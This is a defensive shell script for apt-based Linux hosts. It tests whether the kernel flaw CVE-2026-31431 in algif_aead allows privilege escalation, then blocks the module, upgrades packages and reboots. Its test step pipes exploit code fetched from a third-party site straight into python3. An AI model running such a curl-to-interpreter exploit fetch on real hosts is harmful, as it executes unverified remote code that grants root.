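#!/bin/sh
# fix-copy-fail.sh - harden vs CVE-2026-31431, see: https://copy.fail
# Copyright (c) 2026 Corwin Brust
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.

# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.

# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <https://www.gnu.org/licenses/>.
#
#
# According to the website https://copy.fail (20262431@1pZ-5)
# CVE-2026-31431 enables privilege escalation via exploitation
# of a defect in the linux kernel intended to support a rarely
# used (but typically enabled) kernel module, "algif_aead".
#
# This script grew from walking several dozen apt(1) virtual machines
# and benefited greatly from "peer" review and/or comments from the
# FSF SYSOPS, irc://libera.chat/#emacs and other nerds/activists. thx
#
# Usage: run as root on an apt-based system. If the test below reports
# root, the script blocks the module, upgrades all packages and REBOOTS.
#
# Exit status: 0 when the exploit test did not report root (nothing is
# changed); 1 when a step failed. On the fix path the host reboots.

# more output. output is good.
set -x

# adduser, rmmod, apt-get and shutdown all need root; fail early with a
# clear message instead of a misleading result further down.
if [ "$(id -u)" -ne 0 ]; then
  echo "Check halted: this script must be run as root." >&2
  exit 1
fi

# Delete the test user if it exists.
# passwd(5) fields are separated by ':', so anchor on "testu:" (a
# pattern ending in a space never matches an /etc/passwd entry).
if grep -q '^testu:' /etc/passwd; then
  deluser testu
fi
# NOTE: this makes the script repeatable however
# it will still abandon the 'testu' account
#
# To remove the test account after patching:
#  deluser testu
#
# Note this may not work all in one shot
# due to the exploit screwing with the kernel
# usermap resident in memory.

if ! adduser --disabled-password --gecos='""' testu; then
  echo "Check halted: could not create the 'testu' test account." >&2
  echo "If it is left over from an earlier run, remove it with: deluser testu" >&2
  exit 1
fi

# NOTE(review): the test below downloads code from a third-party site
# and runs it unverified on the host being checked; what is served can
# change between runs. Prefer a reviewed, checksum-pinned copy, run on
# an isolated test VM rather than on a production system.
#
# NOTE(review): the pipeline's status is grep's, so "no root in the
# output" covers both a patched kernel and a test that never ran
# (download failed, curl or python3 missing). In either case the
# mitigation below is skipped.
if su testu -c 'cd; curl https://copy.fail/exp | python3 && su -c id' | grep root; then
  echo "EXPLOIT DETECTED: copy.fail FFI, please see: https://copy.fail"
  echo
  echo "The system MUST be restarted before confirming the fix."
  echo "If changes are made this should happen automatically but do it manually if that fails."
  echo
  echo "Pausing for ten seconds before attempting to fix.."
  sleep 10

  # Make any later attempt to load algif_aead run /bin/false instead.
  if ! echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf; then
    echo "Fix halted: could not write /etc/modprobe.d/disable-algif.conf" >&2
    exit 1
  fi

  # Unloading can fail (module in use or not loaded). The modprobe.d
  # entry still blocks later loads and the reboot below clears a loaded
  # copy, so warn and carry on to the upgrade rather than stopping here.
  if ! rmmod algif_aead; then
    echo "Warning: rmmod algif_aead failed; relying on the reboot to unload it." >&2
  fi

  if ! { apt-get update -y && apt-get upgrade -y && apt-get full-upgrade -y; }; then
    echo "Fix halted: the apt-get upgrade failed, the system is NOT confirmed patched." >&2
    echo "Resolve the apt errors above, upgrade, and reboot manually." >&2
    exit 1
  fi

  if ! shutdown -r now; then
    echo "Upgrade finished but the automatic restart failed: reboot manually." >&2
    exit 1
  fi
else
  # printf rather than echo: "\n" inside echo is not portable across sh
  # implementations.
  printf '%s\n' \
    "Check halted: the exploit test did not report root." \
    "That is the expected result on a system patched for copy.fail, but a" \
    "failed download or a missing curl/python3 looks the same: check above" \
    "for error messages before treating this host as patched."
fi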